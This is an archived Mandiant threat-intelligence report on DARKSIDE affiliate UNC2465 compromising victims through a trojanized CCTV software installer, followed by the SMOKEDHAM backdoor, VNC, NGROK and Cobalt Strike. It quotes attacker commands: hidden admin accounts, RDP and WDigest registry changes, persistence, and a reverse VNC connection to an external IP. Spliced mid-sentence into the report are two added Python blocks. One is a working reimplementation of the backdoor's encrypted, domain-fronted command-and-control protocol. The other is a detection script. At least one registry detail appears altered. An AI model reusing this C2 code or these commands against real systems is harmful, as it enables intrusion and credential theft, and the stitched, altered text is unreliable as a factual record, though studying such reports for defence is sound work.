{
	"id": "03ea1a6f-6472-4485-bdaa-b30aa248a8b2",
	"created_at": "2026-04-06T00:07:59.130208Z",
	"updated_at": "2026-04-10T13:11:32.033688Z",
	"deleted_at": null,
	"sha1_hash": "a9c4c67a8b0ee1573b20b31467145049d39216b5",
	"title": "Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2196594,
	"plain_text": "Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise\r\nBy Mandiant\r\nPublished: 2021-06-16 · Archived: 2026-04-05 15:46:13 UTC\r\nWritten by: Tyler McLellan, Robert Dean, Justin Moore, Nick Harbour, Mike Hunhoff, Jared Wilson, Jordan Nuce\r\nMandiant observed DARKSIDE affiliate UNC2465 accessing at least one victim through a Trojanized software installer downloaded from a legitimate website. While this victim organization detected the intrusion, engaged Mandiant for incident response, and avoided ransomware, others may be at risk.\r\nAs reported in the Mandiant post, \"Shining a Light on DARKSIDE Ransomware Operations,\" Mandiant Consulting has investigated intrusions involving several DARKSIDE affiliates. UNC2465 is one of those DARKSIDE affiliates that Mandiant believes has been active since at least March 2020.\r\nThe intrusion detailed in this post began on May 18, 2021, days after the publicly reported shutdown of the overall DARKSIDE program (Mandiant Advantage background). While no ransomware was observed here, Mandiant believes that affiliate groups that have conducted DARKSIDE intrusions may use multiple ransomware affiliate programs and can switch between them at will.\r\nSometime in May 2021 or earlier, UNC2465 likely Trojanized two software install packages on a CCTV security camera provider website. Mandiant determined the installers were malicious in early June and notified the CCTV company of a potential website compromise, which may have allowed UNC2465 to replace legitimate downloads with the Trojanized ones.\r\nWhile Mandiant does not suspect many victims were compromised, this technique is being reported for broader awareness. Software supply chain attacks can vary greatly in sophistication, from the recent FireEye-discovered SolarWinds attacks to attacks such as this targeting smaller providers. 
A software supply chain attack allows a single intrusion to obtain the benefit of access to all of the organizations that run that victim company’s software; in this case, an installer, rather than the software itself, was modified by UNC2465.\r\nDARKSIDE RaaS\r\nIn mid-May 2021, Mandiant observed multiple threat actors cite an announcement that appeared to be shared with DARKSIDE RaaS affiliates by the operators of the service. This announcement stated that they had lost access to their infrastructure, including their blog, payment, and content distribution network (CDN) servers, and would be closing their service. The post cited law enforcement pressure and pressure from the United States for this decision.\r\nMultiple users on underground forums have since come forward claiming to be unpaid DARKSIDE affiliates, and in some cases privately provided evidence to forum administrators who confirmed that their claims were legitimate.\r\nhttps://www.mandiant.com/resources/darkside-affiliate-supply-chain-software-compromise\r\nPage 1 of 16\r\nSome actors have speculated that the DARKSIDE operator’s decision to close could be an exit scam. While we have not seen evidence suggesting that the operators of the DARKSIDE service have resumed operations, we anticipate that at least some of the former affiliates of the DARKSIDE service will likely identify different ransomware or malware offerings to use within their own operations.\r\nNotably, Mandiant has continued to observe a steady increase in the number of publicly named victims on ransomware shaming sites within the past month. 
Despite the recent ban of ransomware-related posts within underground forums, threat actors can still leverage private chats and connections to identify ransomware services. As one example, in mid-May 2021, the operator of the SODINOKIBI (aka REvil) RaaS indicated that multiple affiliates from other RaaS platforms that had shut down were switching to their service. Based on the perceived profitability of these operations, it is almost certain that numerous threat actors will continue to conduct widespread ransomware operations for the foreseeable future.\r\nBackground\r\nIn June 2021, Mandiant Consulting was engaged to respond to an intrusion. During analysis, Mandiant determined the initial vector was a Trojanized security camera PVR installer from a legitimate website. Mandiant attributed the overall intrusion activity to DARKSIDE affiliate UNC2465 due to continued use of infrastructure and tooling since October 2020.\r\nOn May 18, 2021, a user in the affected organization browsed to the Trojanized link and downloaded the ZIP. Upon installing the software, a chain of downloads and scripts was executed, leading to SMOKEDHAM and later NGROK on the victim’s computer. Additional malware, such as BEACON, and lateral movement were also observed. 
Mandiant believes the Trojanized software was available from May 18, 2021, through June 8, 2021.\r\nPivoting on the slightly modified, but benign, MSHTA.exe application in VirusTotal, Mandiant identified a second installer package with the MD5 hash e9ed774517e129a170cdb856bd13e7e8 (SVStation_Win64-B1130.1.0.0.exe), from May 26, 2021, which also connects out to the same URL as the Trojanized SmartPSS installer.\r\nSupply Chain Intrusion Cycle\r\nFigure 1: Intrusion cycle\r\nPhase 1: Trojanized Installer Download\r\nMandiant Consulting observed the Trojanized installer downloaded on a Windows workstation after the user visited a legitimate site that the victim organization had used before.\r\nThe downloaded file was extracted to C:\\Users\\[username]\\Downloads\\06212019-General-SMARTPSS-Win32-ChnEng-IS\\General_SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023\\SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General-v1.exe.\r\nMandiant confirmed the user intended to download, install, and use the SmartPSS software. Figure 2 shows an image of the download page used for SmartPSS software.\r\nFigure 2: SmartPSS download page\r\nPhase 2: Nullsoft Installer\r\nThe installer executable is a Nullsoft installer that, when executed, wrote two files to C:\\ProgramData\\SMARTPSS-Win32_ChnEng_IS. We were able to extract the malicious installer script and files for analysis using 7-Zip. The relevant section of this installer script is shown below in Figure 3.\r\nFigure 3: Nullsoft installer script section\r\nThe installer script created two files: SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General.exe (b540b8a341c20dced4bad4e568b4cbf9) and smartpss.exe (c180f493ce2e609c92f4a66de9f02ed6). 
The former is a clean installer from the original developer and is launched first, installing the software as the user expects. The latter is launched with a URL as its command-line argument and executes the content retrieved from that URL.\r\nThe smartpss.exe file contained metadata describing itself as MSHTA.exe from Microsoft, a legitimate operating system component, but the MD5 hash was unknown. Disassembly analysis of the program showed it was a small application that loaded the IE COM object and launched the function RunHTMLApplication() against the command line argument provided. This functionality matched the behavior of the legitimate MSHTA.exe despite the hash discrepancy. Further analysis showed that the file was a 2018 version of the legitimate binary (original hash: 5ced5d5b469724d9992f5e8117ecefb5) with only six bytes of data appended, as shown in Figure 4. Appending bytes changes the file hash without changing what executes, so hash reputation lookups return no match while the behavior remains that of the legitimate tool.\r\nFigure 4: CyberChef diff between MSHTA.exe and smartpss.exe\r\nPhase 3: Downloaded VBScript and PowerShell\r\nUpon execution, the modified Mshta file was run with the URL hxxp://sdoc[.]xyz/ID-508260156241 passed as an argument on the command line:\r\nC:\\PROGRAMDATA\\SMARTPSS-Win32_ChnEng_IS\\smartpss.exe hxxp://sdoc[.]xyz/ID-508260156241\r\nDomain sdoc[.]xyz was first associated with UNC2465 by RiskIQ in a May 20, 2021, blog post researching the infrastructure that Mandiant previously reported. According to RiskIQ, sdoc[.]xyz shares a registrant with koliz[.]xyz, which was also observed by Mandiant in past UNC2465 intrusions.\r\nThe execution of the modified Mshta file resulted in the creation of an HTM file called loubSi78Vgb9[1].htm that was written to a temporary INetCache directory. 
Mandiant was not able to acquire this file at the time of writing; however, Mandiant was able to recover partial contents of the file.\r\nFigure 5: PCAP from e9ed774517e129a170cdb856bd13e7e8 VirusTotal results not returning malicious content\r\nShortly after the download, a PowerShell script block was executed to download SMOKEDHAM, as shown in Figure 6.\r\nFigure 6: SMOKEDHAM downloader\r\nWithin seconds, a file named qnxfhfim.cmdline was written to disk and executed using the Command-Line Compiler (csc.exe), which is how Add-Type compiles inline C# source on Windows PowerShell:\r\ncsc.exe /noconfig /fullpaths @'C:\\Users\\ [username]\\AppData\\Local\\Temp\\qnxfhfim\\qnxfhfim.cmdline'\r\nMandiant was not able to recover this file at the time of writing; however, Mandiant was able to recover partial contents of the file.\r\n.../t:library /utf8output /R:'System.dll' /R:'C:\\windows\\Microso\r\nAfter the execution of qnxfhfim.cmdline, PowerShell initiated the first connection to the fronted domain lumiahelptipsmscdnqa[.]microsoft[.]com used by SMOKEDHAM.\r\nPhase 4: SMOKEDHAM Dropper\r\nThe SMOKEDHAM dropper (f075c2894ac84df4805e8ccf6491a4f4) is written in PowerShell and decrypts and executes the SMOKEDHAM backdoor in memory. The dropper uses the Add-Type cmdlet to define a new .NET class for the backdoor. The Add-Type cmdlet can define a new .NET class from an existing assembly, from source code files, or from source code specified inline or saved in a variable. In this case, the dropper uses SMOKEDHAM backdoor source code that is stored in a variable.\r\nThe SMOKEDHAM backdoor source code is embedded as an encrypted string. The dropper uses the ConvertTo-SecureString cmdlet and an embedded key to decrypt the source code prior to executing the Add-Type cmdlet.\r\nAfter defining a new .NET class for the backdoor, the dropper executes the backdoor's entry point. 
The dropper configures the backdoor with a C2 server address, RC4 encryption key, and sleep interval. Figure 7 shows the deobfuscated SMOKEDHAM dropper.\r\nFigure 7: SMOKEDHAM dropper\r\nPhase 5: SMOKEDHAM Backdoor\r\nSMOKEDHAM (127bf1d43313736c52172f8dc6513f56) is a .NET-based backdoor that supports commands, including screen capture and keystroke capture. The backdoor may also download and execute additional PowerShell commands from its command and control (C2) server.\r\nSMOKEDHAM Network Communications\r\nSMOKEDHAM communicates with its C2 server using HTTPS. The backdoor uses domain fronting to obfuscate its true C2 server: the TLS connection is made to a high-reputation fronted domain, while the HTTP Host header inside that connection names the actual C2 endpoint served by the same content delivery network. The fronted domain is configured by an earlier stage of execution and the actual domain is hard-coded in the backdoor. Mandiant observed the fronted domain lumiahelptipsmscdnqa.microsoft[.]com and hard-coded domain max-ghoster1.azureedge[.]net used for C2 server communication.\r\nThe communication between SMOKEDHAM and its C2 server consists of JSON data exchanged via HTTP POST requests. The backdoor initiates requests to the C2 server and the C2 server may include commands to execute in the responses. The JSON data exchanged between SMOKEDHAM and its C2 server contains three fields: ID, UUID, and Data.\r\nThe ID field contains a unique value generated by the backdoor for the target system.\r\nThe UUID field may contain a unique value used to track command output or be empty. When the C2 server responds with a command to execute, it sets the UUID field to a unique value. SMOKEDHAM then sets the same UUID value in the subsequent HTTP POST request that contains the command output.\r\nThe Data field may contain RC4-encrypted, Base64-encoded command data or be empty. The backdoor uses the Data field to send command output to its C2 server. 
The C2 server uses the Data field to send commands to the backdoor to execute. The backdoor uses an RC4 key configured by an earlier stage of execution to encrypt and decrypt the Data field. Mandiant observed the RC4 key UwOdHsFXjdCOIrjTCfnblwEZ used for RC4 encryption and decryption.\r\nSMOKEDHAM Commands\r\nSMOKEDHAM Base64-decodes, then RC4-decrypts, command data returned in the Data field. The backdoor checks if the plaintext command data begins with one of the following keywords, shown in Table 1.\r\nKeyword | Action\r\ndelay | Update its sleep interval\r\nscreenshot | Upload a screen capture to its C2 server via a subsequent HTTP POST request\r\nexit | Terminate\r\nTable 1: Plaintext command data keywords\r\nIf the plaintext command data does not begin with any of the keywords listed in Table 1, then SMOKEDHAM assumes the data contains a PowerShell command and attempts to execute it. The backdoor uploads output generated by the PowerShell command to its C2 server via a subsequent HTTP POST request.\r\nIn addition to supporting the commands in Table 1, SMOKEDHAM continuously captures keystrokes. 
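\r\nThe SMOKEDHAM C2 exchange described under SMOKEDHAM Network Communications and SMOKEDHAM Commands, written out as runnable Python. This is an added example, not code from Mandiant or from the backdoor itself: the RC4 key, the JSON field names, the fronted and hard-coded hosts and the keyword dispatch are taken from the report, while the message helpers, the fronted-request builder, the bot identifier and the sample commands are constructed for illustration. Because RC4 is symmetric, the same function serves both the backdoor and an analyst decoding captured POST bodies.\r\n
```python
import base64
import json
import uuid

# From the report: the RC4 key observed in this intrusion, the fronted domain and
# the hard-coded C2 host. Everything else in this file is constructed for the example.
RC4_KEY = b'UwOdHsFXjdCOIrjTCfnblwEZ'
FRONT_HOST = 'lumiahelptipsmscdnqa.microsoft.com'
REAL_HOST = 'max-ghoster1.azureedge.net'
KEYWORDS = ('delay', 'screenshot', 'exit')
CRLF = chr(13) + chr(10)


def rc4(key, data):
    '''Plain RC4 (key schedule + keystream XOR); encrypt and decrypt are the same call.'''
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) % 256
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + s[i]) % 256
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) % 256])
    return bytes(out)


def encode_data(text, key=RC4_KEY):
    '''Data field as the report describes it: RC4-encrypt, then Base64-encode.'''
    return base64.b64encode(rc4(key, text.encode('utf-8'))).decode('ascii')


def decode_data(field, key=RC4_KEY):
    '''Inverse of encode_data; an empty Data field (no command, no output) decodes to an empty string.'''
    if not field:
        return ''
    return rc4(key, base64.b64decode(field)).decode('utf-8')


def classify(command):
    '''Table 1 dispatch: a leading keyword, otherwise the data is treated as PowerShell.'''
    for keyword in KEYWORDS:
        if command.startswith(keyword):
            return keyword
    return 'powershell'


def server_task(bot_id, command, key=RC4_KEY):
    '''C2 -> backdoor: tasking response. The server mints the UUID the bot must echo back.'''
    return json.dumps({'ID': bot_id, 'UUID': str(uuid.uuid4()), 'Data': encode_data(command, key)})


def decode_message(body, key=RC4_KEY):
    '''Either direction: parse a JSON body, decrypt Data and name the action it would trigger.'''
    msg = json.loads(body)
    text = decode_data(msg.get('Data', ''), key)
    return {'id': msg['ID'], 'uuid': msg['UUID'], 'text': text, 'action': classify(text)}


def bot_reply(task, output, key=RC4_KEY):
    '''Backdoor -> C2: output POST carrying the UUID from the tasking response it answers.'''
    return json.dumps({'ID': task['id'], 'UUID': task['uuid'], 'Data': encode_data(output, key)})


def fronted_request(path, body):
    '''Shape of a fronted request: the TLS session (and its SNI) is opened to FRONT_HOST,
    while the Host header inside it names the real CDN endpoint. Returns the host to
    connect to and the request text; nothing is sent.'''
    request = CRLF.join([
        'POST ' + path + ' HTTP/1.1',
        'Host: ' + REAL_HOST,
        'Content-Type: application/json',
        'Content-Length: ' + str(len(body.encode('utf-8'))),
        '',
        body,
    ])
    return FRONT_HOST, request


if __name__ == '__main__':
    task = decode_message(server_task('bot-0001', 'whoami /priv'))
    print(task['action'], task['text'])
    reply = bot_reply(task, 'constructed output')
    print(decode_message(reply)['uuid'] == task['uuid'])
    print(fronted_request('/', reply)[1].split(CRLF)[1])
```
When decoding real captures, feed decode_message the POST body and the key recovered from the dropper (the report notes the key is set by an earlier stage, so it can differ between samples); an output message with a UUID that matches no prior tasking response is the backdoor's periodic keystroke upload rather than a command result.\r\n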
The backdoor writes captured keystrokes to memory and uploads them to its C2 server every five seconds via HTTP POST requests.\r\nSMOKEDHAM In Action\r\nSMOKEDHAM was observed executing commands on the target system using PowerShell.\r\nThe following commands were used to collect information about the system and logged in users.\r\nnet.exe user\r\nnet.exe users\r\nwhoami.exe\r\nwhoami.exe /priv\r\nsysteminfo.exe\r\nThe following commands were used to create the DefaultUser account, add it to the local Administrators group, and subsequently hide the account from the Windows logon screen.\r\nnet.exe user DefaultUser REDACTED /ADD\r\nnet.exe localgroup Administrators DefaultUser /ADD\r\nreg.exe ADD 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList' /v DefaultUser\r\nThe following commands facilitated lateral movement by modifying Terminal Server registry values to enable Remote Desktop connections (fDenyTSConnections set to 0) and allow multiple concurrent Remote Desktop sessions per user (fSingleSessionPerUser set to 0), and by modifying the Local Security Authority (LSA) registry value LimitBlankPasswordUse to require a password for authentication.\r\nreg.exe ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f\r\nreg.exe ADD 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server' /v fSingleSessionPerUser /t REG_DWORD /d 0 /\r\nreg.exe ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa /v LimitBlankPasswordUse /t REG_DWORD /d 1 /f\r\nAdditionally, SMOKEDHAM modified the WDigest registry value HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential to enable cleartext credential caching, so that the LSASS memory dumped later in the intrusion would hold plaintext passwords for logons made after the change.\r\nPhase 6: Follow-on Activity\r\nSMOKEDHAM used PowerShell to connect to third-party file sharing sites to download the UltraVNC application renamed as winvnc.exe, and a configuration file named UltraVNC.ini, shown in Figure 8. These files were saved to the %APPDATA%\\Chrome\\ directory. 
The UltraVNC.ini file allowed UltraVNC to accept connections on port 6300 from the loopback address, permitted by the parameter AllowLoopback=1.\r\nFigure 8: Contents of UltraVNC.ini\r\nSMOKEDHAM was observed using UltraVNC to establish a reverse connection to the IP address and port pair 81.91.177[.]54[:]7234 that has been observed in past UNC2465 intrusions.\r\n%APPDATA%\\Chrome\\winvnc.exe' -autoreconnect ID:15000151 -connect 81.91.177[.]54[:]7234 -run\r\nSMOKEDHAM created a persistence mechanism for UltraVNC by adding the application to the ConhostNT value under the current user's Run registry key.\r\nreg.exe add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v ConhostNT /d %appdata%\\Chrome\\winvnc.exe\r\nNGROK Configuration\r\nSMOKEDHAM used PowerShell to connect to third-party file sharing sites to download an NGROK utility that was renamed conhost.exe, and a script named VirtualHost.vbs that was used to execute NGROK with a configuration file named ngrok.yml. These files were stored in the C:\\ProgramData\\WindNT\\ directory. 
NGROK is a publicly available utility that can expose local servers behind NATs and firewalls to the public internet over secure tunnels.\r\nFigure 9 and Figure 10 show the contents of the VirtualHost.vbs and ngrok.yml files, respectively.\r\nFigure 9: Contents of VirtualHost.vbs\r\nFigure 10: Contents of ngrok.yml\r\nThe execution of VirtualHost.vbs started NGROK with a TCP tunnel for local port 6300, the port on which UltraVNC accepted loopback connections. Because NGROK makes an outbound connection to the NGROK service and exposes a public endpoint that forwards to the local port, the attacker could reach the UltraVNC server from the internet without any inbound firewall change, which is how the UltraVNC traffic was tunneled out of the environment.\r\nSMOKEDHAM created a persistence mechanism for NGROK by adding VirtualHost.vbs to the WindNT value under the current user's Run registry key.\r\nreg.exe add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v WindNT /d C:\\ProgramData\\WindNT\\VirtualHost.v\r\nKeylogger Deployment\r\nThis attacker utilized an additional keylogging utility named C:\\ProgramData\\psh\\console.exe. The keylogging utility was configured to capture and record keystrokes to C:\\ProgramData\\psh\\System32Log.txt.\r\nMandiant then observed the attacker use UltraVNC to download two LNK files that reference the keylogging utility. The downloaded files were named desktop.lnk and console.lnk, respectively, and were placed in the following persistence locations:\r\nC:\\Users\\[username]\\Start Menu\\Programs\\Startup\\desktop.lnk\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\desktop.lnk\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\console.lnk\r\nCobalt Strike Beacon\r\nThe attacker used UltraVNC to download an in-memory dropper for Cobalt Strike to C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe. 
Update.exe was a Go-based dropper created using the ScareCrow framework.\r\nThe attacker executed C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe using Command Prompt.\r\ncmd.exe /c 'C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe'\u0026\u0026exit\r\nThe execution of the ScareCrow framework dropper C:\\ProgramData\\Cisco Systems\\Cisco Jabber\\update.exe resulted in the creation of a Cobalt Strike stageless payload at C:\\ProgramData\\Cisco\\update.exe, which, when executed, established a connection to a Cobalt Strike Beacon server located at w2doger[.]xyz.\r\nMandiant observed the attacker using UltraVNC to download and store a file named update.lnk in the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ directory. Mandiant was not able to recover update.lnk at the time of writing, but suspects that this file was created to add persistence for the Cobalt Strike stageless payload.\r\nLSASS Dumping and Lateral Movement\r\nMandiant observed this attacker dump the LSASS process using Task Manager to a file named lsass.DMP, and later zip the dump into two files named lsass.zip and lsass2.zip located in the C:\\ProgramData\\psh\\ directory. From this point, the attacker was observed moving laterally to different systems in the environment using Remote Desktop Protocol (RDP) connections.\r\nConclusion\r\nUNC2465 established initial access via a Trojanized installer executed by an unsuspecting user. UNC2465 interactively established an NGROK tunnel and began moving laterally in less than 24 hours. Five days later, UNC2465 returned, deployed additional tools such as a keylogger and Cobalt Strike BEACON, and conducted credential harvesting by dumping LSASS memory.\r\nRansomware groups continue to adapt and pursue opportunistic access to victims. 
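\r\nThe host-side traces of this intrusion, expressed as endpoint triage rules over process-creation command lines: the registry edits listed under SMOKEDHAM In Action, the Run-key persistence, the reverse UltraVNC connection, NGROK masquerading as conhost.exe outside System32, and the csc.exe compile that Add-Type leaves behind. This is an added example and not Mandiant's code; the sample lines are constructed from the commands the report shows, while the user name, the NGROK command-line arguments and the final benign control line are assumptions.\r\n
```python
import ipaddress
import re

BS = chr(92)  # one backslash, kept out of the literals so this file has no escape sequences


def winpath(text):
    '''Turn a forward-slash path or registry key into its Windows form.'''
    return text.replace('/', BS)


# Constructed process-creation command lines modelled on the commands the report lists.
# The user name, the NGROK arguments and the last (benign) line are assumptions.
TS_KEY = winpath('HKLM/SYSTEM/CurrentControlSet/Control/Terminal Server')
SAMPLE_LINES = [
    'net.exe user DefaultUser REDACTED /ADD',
    'net.exe localgroup Administrators DefaultUser /ADD',
    'reg.exe ADD ' + winpath('HKLM/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon/SpecialAccounts/UserList') + ' /v DefaultUser',
    'reg.exe ADD ' + TS_KEY + ' /v fDenyTSConnections /t REG_DWORD /d 0 /f',
    'reg.exe ADD ' + TS_KEY + ' /v fSingleSessionPerUser /t REG_DWORD /d 0 /f',
    'reg.exe ADD ' + winpath('HKLM/SYSTEM/CurrentControlSet/Control/SecurityProviders/WDigest') + ' /v UseLogonCredential /t REG_DWORD /d 1 /f',
    'reg.exe add ' + winpath('HKCU/SOFTWARE/Microsoft/Windows/CurrentVersion/Run') + ' /v ConhostNT /d ' + winpath('%appdata%/Chrome/winvnc.exe'),
    winpath('C:/Users/alice/AppData/Roaming/Chrome/winvnc.exe') + ' -autoreconnect ID:15000151 -connect 81.91.177.54:7234 -run',
    winpath('C:/ProgramData/WindNT/conhost.exe') + ' start --all --config ' + winpath('C:/ProgramData/WindNT/ngrok.yml'),
    'csc.exe /noconfig /fullpaths @' + winpath('C:/Users/alice/AppData/Local/Temp/qnxfhfim/qnxfhfim.cmdline'),
    'reg.exe ADD ' + TS_KEY + ' /v fDenyTSConnections /t REG_DWORD /d 1 /f',  # benign: disables RDP
]

REG_ADD = re.compile('(?i)^reg(?:[.]exe)? +add +(.+?) +/v +([^ ]+)(?:.* +/d +([^ ]+))?')
NET_USER_ADD = re.compile('(?i)^net(?:1|[.]exe)? +user +([^ ]+) +.*/add')
NET_ADMIN_ADD = re.compile('(?i)^net(?:1|[.]exe)? +localgroup +administrators +([^ ]+) +/add')
VNC_CONNECT = re.compile('-connect +([0-9.]+):([0-9]+)')


def check_registry(line):
    '''Registry edits the report ties to RDP exposure, WDigest credentials and persistence.'''
    m = REG_ADD.match(line)
    if not m:
        return None
    key, name, data = m.group(1).lower(), m.group(2).lower(), (m.group(3) or '').lower()
    if name == 'fdenytsconnections' and data == '0':
        return 'RDP enabled via registry'
    if name == 'fsinglesessionperuser' and data == '0':
        return 'multiple RDP sessions per user enabled'
    if name == 'uselogoncredential' and data == '1':
        return 'WDigest cleartext credential caching enabled'
    if name == 'limitblankpassworduse':
        return 'LSA LimitBlankPasswordUse changed to ' + data
    if key.endswith(winpath('specialaccounts/userlist')):
        return 'account hidden from logon screen: ' + m.group(2)
    if key.endswith(winpath('currentversion/run')):
        return 'Run key persistence: ' + m.group(2) + ' -> ' + (m.group(3) or '')
    return None


def check_vnc(line):
    '''A VNC -connect to a non-private address is a reverse VNC session leaving the host.'''
    low = line.lower()
    m = VNC_CONNECT.search(low)
    if not m or 'vnc' not in low:
        return None
    try:
        external = not ipaddress.ip_address(m.group(1)).is_private
    except ValueError:
        return None
    return 'reverse VNC to external ' + m.group(1) + ':' + m.group(2) if external else None


def check_conhost(line):
    '''conhost.exe lives in System32; the renamed NGROK in the report ran from ProgramData.'''
    m = re.match('([^ ]+conhost[.]exe)', line.lower())
    if m and not m.group(1).startswith(winpath('c:/windows/system32/')):
        return 'conhost.exe outside System32: ' + m.group(1)
    return None


def check_csc(line):
    '''Add-Type with inline source compiles through csc.exe using a .cmdline file in Temp.'''
    low = line.lower()
    if 'csc.exe' in low and '/noconfig' in low and '.cmdline' in low and winpath('/temp/') in low:
        return 'runtime C# compile from Temp (Add-Type style)'
    return None


def new_admins(lines):
    '''Correlate net user /ADD with net localgroup Administrators /ADD for the same name.'''
    added = {m.group(1).lower() for m in map(NET_USER_ADD.match, lines) if m}
    admins = {m.group(1).lower() for m in map(NET_ADMIN_ADD.match, lines) if m}
    return sorted(added & admins)


def triage(lines):
    '''Run every rule over every line; returns (finding, line) pairs plus one per new admin.'''
    findings = []
    for line in lines:
        for check in (check_registry, check_vnc, check_conhost, check_csc):
            hit = check(line)
            if hit:
                findings.append((hit, line))
    for user in new_admins(lines):
        findings.append(('new local administrator: ' + user, user))
    return findings


if __name__ == '__main__':
    for finding, line in triage(SAMPLE_LINES):
        print(finding + ' | ' + line)
```
The rules key on the value being set, not just the command name, so the benign last line (fDenyTSConnections set back to 1) produces no finding; on real data, feed the command-line field of Sysmon event 1 or Windows event 4688 and correlate the account-creation pair per host rather than across the whole input.\r\n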
UNC2465’s move from drive-by attacks on website visitors or phishing emails to this software supply chain attack shows a concerning shift that presents new challenges for detection. While many organizations are now focusing more on perimeter defenses and two-factor authentication after recent public examples of password reuse or VPN appliance exploitation, monitoring on endpoints is often overlooked or left to traditional antivirus. A well-rounded security program is essential to mitigate risk from sophisticated groups such as UNC2465 as they continue to adapt to a changing security landscape.\r\nIndicators\r\nSupply Chain/Trojanized Nullsoft Installer/SmartPSS\r\nMD5: 1430291f2db13c3d94181ada91681408\r\nFilename: SMARTPSS-Win32_ChnEng_IS_V2.002.0000007.0.R.181023-General-v1.exe\r\nZip MD5: 54e0a0d398314f330dfab6cd55d95f38\r\nSupply Chain/Trojanized Nullsoft Installer/SVStation\r\nMD5: e9ed774517e129a170cdb856bd13e7e8\r\nFilename: SVStation_Win64-B1130.1.0.0.exe\r\nIntermediate Stage\r\nURL: hxxp://sdoc[.]xyz/ID-508260156241\r\nIP: 185.92.151[.]150\r\nSMOKEDHAM LOADER\r\nMD5: f075c2894ac84df4805e8ccf6491a4f4 (Gbdh7yghJgbj3bb.html)\r\nMD5: 05d38c7e957092f7d0ebfc7bf1eb5365\r\nSMOKEDHAM\r\nMD5: 127bf1d43313736c52172f8dc6513f56 (in-memory from f075c2894ac84df4805e8ccf6491a4f4)\r\nHost: max-ghoster1.azureedge[.]net (actual C2)\r\nMD5: 9de326bf37270776b78e30d442bda48b (MEtNOcyfkXWe.html)\r\nHost: atlant20.azureedge[.]net (actual C2)\r\nMD5: b06319542cab55346776f0358a61b3b3 (in-memory from 05d38c7e957092f7d0ebfc7bf1eb5365)\r\nHost: skolibri13.azureedge[.]net (actual C2)\r\nNGROK\r\nMD5: e3bc4dd84f7a24f24d790cc289e0a10f (legitimate NGROK renamed to conhost.exe)\r\nMD5: 84ed6012ec62b0bddcd18058a8ff7ddd (VirtualHost.vbs)\r\nUltraVNC\r\nIP/Port: 81.91.177[.]54:7234 (using legitimate ULTRAVNC 23b89bf2c2b99fbc1e232b4f86af65f4)\r\nBEACON\r\nHost: 
w2doger[.]xyz\r\nIP: 185.231.68.102\r\nMD5: a9fa3eba3f644ba352462b904dfbcc1a (shellcode)\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms. The following contains specific detection names that provide indicators associated with this activity.\r\nPlatform | Detection Name\r\nFireEye Network Security, FireEye Email Security, FireEye Detection On Demand, FireEye Malware Analysis, FireEye Malware File Protect | Backdoor.BEACON; FE_Loader_Win32_BLUESPINE_1; Trojan.Win32.CobaltStrike; Backdoor.MSIL.SMOKEDHAM; Malware.Binary.ps1; FEC_Backdoor_CS_SMOKEDHAM_1; Suspicious Process PowerShell Activity\r\nFireEye Endpoint Security, Real-Time Detection (IOC) | WDIGEST CREDENTIAL EXPOSURE (METHODOLOGY); WDIGEST CREDENTIAL EXPOSURE VIA REGISTRY (METHODOLOGY); SUSPICIOUS CONHOST.EXE A (METHODOLOGY); TASKMGR PROCESS DUMP OF LSASS.EXE A (METHODOLOGY)\r\nFireEye Endpoint Security, Malware Protection (AV/MG) | Trojan.GenericFCA.Script.533; Trojan.GenericFCA.Agent.7732; Dropped:Trojan.VBS.VGU; Trojan.CobaltStrike.FM; NGRok; Ultra VNC; SVN Station; Generic.mg.a9fa3eba3f644ba3; Generic.mg.1626373508569884\r\nFireEye Endpoint Security, Modules | Process Guard (LSASS memory protection)\r\nFireEye Helix | VNC METHODOLOGY [Procs] (T1021.005); WINDOWS ANALYTICS [Abnormal RDP Logon] (T1078); WINDOWS ANALYTICS [Recon Commands] (T1204); WINDOWS METHODOLOGY [Cleartext Credentials Enabled - UseLogonCredential] (T1003.001); WINDOWS METHODOLOGY [LSASS Generic Dump Activity] (T1003.001); WINDOWS METHODOLOGY [LSASS Memory Access] (T1003.001); WINDOWS METHODOLOGY [Registry Run Key - reg.exe] (T1547.001); WINDOWS METHODOLOGY [User Created - Net Command] (T1136.001)\r\nYara Detections\r\nrule Backdoor_Win_SMOKEDHAM\r\n{\r\nmeta:\r\nauthor = \"Mandiant\"\r\ndate_created = \"2021-06-10\"\r\nmd5 = 
